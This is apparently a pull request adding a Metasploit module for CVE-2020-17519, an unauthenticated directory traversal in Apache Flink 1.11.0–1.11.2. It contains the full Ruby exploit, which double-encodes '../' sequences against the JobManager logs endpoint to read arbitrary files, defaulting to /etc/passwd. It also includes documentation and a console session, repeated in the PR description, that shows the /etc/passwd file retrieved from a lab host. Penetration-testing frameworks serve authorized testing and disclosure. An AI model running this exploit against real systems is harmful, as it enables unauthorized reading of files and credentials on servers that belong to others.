### PR TITLE
Add Apache Flink JobManager Traversal

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/apache_flink_jobmanager_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/apache_flink_jobmanager_traversal.md
@@ -1,0 +1,105 @@
+## Vulnerable Application
+
+This module exploits an unauthenticated directory traversal vulnerability
+in [Apache Flink](https://flink.apache.org) versions 1.11.0 <= 1.11.2.
+
+The JobManager REST API fails to validate user-supplied log file paths,
+allowing retrieval of arbitrary files with the privileges of the web server user.
+
+This module has been tested successfully on:
+
+* Apache Flink version 1.11.2 on Ubuntu 18.04.4.
+
+## Verification Steps
+
+```sh
+wget 'https://archive.apache.org/dist/flink/flink-1.11.2/flink-1.11.2-bin-scala_2.11.tgz'
+tar zxvf flink-1.11.2-bin-scala_2.11.tgz
+cd flink-1.11.2/
+./bin/start-cluster.sh
+```
+
+Metasploit:
+
+1. `./msfconsole`
+1. `use auxiliary/scanner/http/apache_flink_jobmanager_traversal`
+1. `set rhosts <rhost>`
+1. `set filepath <file path>`
+1. `run`
+
+## Options
+
+### FILEPATH
+
+The path to the file to read (Default: `/etc/passwd`)
+
+### DEPTH
+
+Depth for path traversal (Default: `10`)
+
+## Scenarios
+
+### Apache Flink version 1.11.2 on Ubuntu 18.04.4
+
+```
+msf6 > use auxiliary/scanner/http/apache_flink_jobmanager_traversal 
+msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > set rhosts 172.16.191.195
+rhosts => 172.16.191.195
+msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > check
+[*] 172.16.191.195:8081 - The target appears to be vulnerable. Apache Flink version 1.11.2 appears vulnerable.
+msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > set filepath /etc/passwd
+filepath => /etc/passwd
+msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > run
+
+[*] Downloading /etc/passwd ...
+[+] Downloaded /etc/passwd (2401 bytes)
+[+] File /etc/passwd saved in: /root/.msf4/loot/20210216114934_default_172.16.191.195_apache.flink.job_754087.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > cat /root/.msf4/loot/20210216114934_default_172.16.191.195_apache.flink.job_754087.txt
+[*] exec: cat /root/.msf4/loot/20210216114934_default_172.16.191.195_apache.flink.job_754087.txt
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
+systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
+syslog:x:102:106::/home/syslog:/usr/sbin/nologin
+messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
+_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
+uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
+avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
+usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
+rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
+cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
+speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
+whoopsie:x:112:117::/nonexistent:/bin/false
+kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
+saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
+pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
+avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
+colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
+hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
+geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
+gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
+gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
+user:x:1000:1000:user,,,:/home/user:/bin/bash
+msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > 
+```
+

--- a/modules/auxiliary/scanner/http/apache_flink_jobmanager_traversal.rb
+++ b/modules/auxiliary/scanner/http/apache_flink_jobmanager_traversal.rb
@@ -1,0 +1,130 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache Flink JobManager Traversal',
+        'Description' => %q{
+          This module exploits an unauthenticated directory traversal vulnerability
+          in Apache Flink versions 1.11.0 <= 1.11.2. The JobManager REST API fails
+          to validate user-supplied log file paths, allowing retrieval of arbitrary
+          files with the privileges of the web server user.
+
+          This module has been tested successfully on Apache Flink version 1.11.2
+          on Ubuntu 18.04.4.
+        },
+        'Author' =>
+          [
+            '0rich1 - Ant Security FG Lab', # Vulnerability discovery
+            'Hoa Nguyen - Suncsr Team', # Metasploit module
+            'bcoles', # Metasploit module cleanup and improvements
+          ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            ['CVE', '2020-17519'],
+            ['CWE', '22'],
+            ['EDB', '49398'],
+            ['PACKETSTORM', '160849'],
+            ['URL', 'http://www.openwall.com/lists/oss-security/2021/01/05/2'],
+            ['URL', 'https://www.tenable.com/cve/CVE-2020-17519']
+          ],
+        'DefaultOptions' => { 'RPORT' => 8081 },
+        'DisclosureDate' => '2021-01-05'
+      )
+    )
+
+    register_options([
+      OptInt.new('DEPTH', [ true, 'Depth for path traversal', 10]),
+      OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd'])
+    ])
+  end
+
+  def check_host(_ip)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'config')
+    })
+
+    unless res
+      return Exploit::CheckCode::Safe('No reply.')
+    end
+
+    unless res.body.include?('flink')
+      return Exploit::CheckCode::Safe('Target is not Apache Flink.')
+    end
+
+    version = res.get_json_document['flink-version']
+
+    if version.blank?
+      return Exploit::CheckCode::Detected('Could not determine Apache Flink software version.')
+    end
+
+    if Gem::Version.new(version).between?(Gem::Version.new('1.11.0'), Gem::Version.new('1.11.2'))
+      return Exploit::CheckCode::Appears("Apache Flink version #{version} appears vulnerable.")
+    end
+
+    Exploit::CheckCode::Safe("Apache Flink version #{version} is not vulnerable.")
+  end
+
+  def retrieve_file(depth, filepath)
+    traversal = Rex::Text.uri_encode(Rex::Text.uri_encode("#{'../' * depth}#{filepath}", 'hex-all'))
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'jobmanager', 'logs', traversal)
+    })
+
+    unless res
+      print_error('No reply')
+      return
+    end
+
+    if res.code == 404
+      print_error('File not found')
+      return
+    end
+
+    if res.code == 500
+      print_error("Unexpected reply (HTTP #{res.code}): Server encountered an error attempting to read file")
+      msg = res.body.scan(/Caused by: (.+?)\\n/).flatten.last
+      print_error(msg) if msg
+      return
+    end
+
+    if res.code != 200
+      print_error("Unexpected reply (HTTP #{res.code})")
+      return
+    end
+
+    res.body.to_s
+  end
+
+  def run_host(ip)
+    depth = datastore['DEPTH']
+    filepath = datastore['FILEPATH']
+
+    print_status("Downloading #{filepath} ...")
+    res = retrieve_file(depth, filepath)
+
+    return if res.blank?
+
+    print_good("Downloaded #{filepath} (#{res.length} bytes)")
+    path = store_loot(
+      'apache.flink.jobmanager.traversal',
+      'text/plain',
+      ip,
+      res,
+      File.basename(filepath)
+    )
+    print_good("File #{filepath} saved in: #{path}")
+  end
+end


### PR DESCRIPTION
## Vulnerable Application

This module exploits an unauthenticated directory traversal vulnerability
in [Apache Flink](https://flink.apache.org) versions 1.11.0 <= 1.11.2.

The JobManager REST API fails to validate user-supplied log file paths,
allowing retrieval of arbitrary files with the privileges of the web server user.

This module has been tested successfully on:

* Apache Flink version 1.11.2 on Ubuntu 18.04.4.

## Verification Steps

```sh
wget 'https://archive.apache.org/dist/flink/flink-1.11.2/flink-1.11.2-bin-scala_2.11.tgz'
tar zxvf flink-1.11.2-bin-scala_2.11.tgz
cd flink-1.11.2/
./bin/start-cluster.sh
```

Metasploit:

1. `./msfconsole`
1. `use auxiliary/scanner/http/apache_flink_jobmanager_traversal`
1. `set rhosts <rhost>`
1. `set filepath <file path>`
1. `run`

## Options

### FILEPATH

The path to the file to read (Default: `/etc/passwd`)

### DEPTH

Depth for path traversal (Default: `10`)

## Scenarios

### Apache Flink version 1.11.2 on Ubuntu 18.04.4

```
msf6 > use auxiliary/scanner/http/apache_flink_jobmanager_traversal 
msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > set rhosts 172.16.191.195
rhosts => 172.16.191.195
msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > check
[*] 172.16.191.195:8081 - The target appears to be vulnerable. Apache Flink version 1.11.2 appears vulnerable.
msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > set filepath /etc/passwd
filepath => /etc/passwd
msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > run
[*] Downloading /etc/passwd ...
[+] Downloaded /etc/passwd (2401 bytes)
[+] File /etc/passwd saved in: /root/.msf4/loot/20210216114934_default_172.16.191.195_apache.flink.job_754087.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > cat /root/.msf4/loot/20210216114934_default_172.16.191.195_apache.flink.job_754087.txt
[*] exec: cat /root/.msf4/loot/20210216114934_default_172.16.191.195_apache.flink.job_754087.txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > 
```